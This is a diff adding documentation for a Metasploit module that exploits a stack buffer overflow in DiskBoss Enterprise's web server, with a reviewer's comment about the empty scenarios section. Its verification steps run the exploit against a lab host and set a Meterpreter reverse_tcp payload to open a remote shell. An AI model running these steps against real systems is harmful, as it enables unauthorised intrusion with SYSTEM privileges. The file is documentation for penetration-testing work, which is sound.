documentation/modules/exploit/windows/http/diskboss_get_bof.md

```diff
@@ -0,0 +1,96 @@
+## Vulnerable Application
+
+DiskBoss Enterprise versions up to v7.5.12 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows XP SP3 and Windows 7 SP1.
+
+## Verification Steps
+  1. Install a vulnerable DiskBoss Enterprise
+  2. Start `DiskBoss Enterprise` service
+  3. Start `DiskBoss Enterprise` client application
+  4. Navigate to `Tools` > `DiskBoss Server Options` > `Server`
+  5. Check `Enable Web Server On Port 80` to start the web interface
+  6. Start `msfconsole`
+  7. Do `use exploit/windows/http/diskboss_get_bof`
+  8. Do `set rhost 192.168.198.130`
+  9. Do `check`
+  10. Verify the target is vulnerable
+  11. Do `set payload windows/meterpreter/reverse_tcp`
+  12. Do `set lhost 192.168.198.138`
+  13. Do `exploit`
+  14. Verify the Meterpreter session is opened
+
+## Scenarios
+
+```
```

Comment:
This block I would lead off with some text about how its ##DiskBoss Enterprise v7.5.12 on XP sp3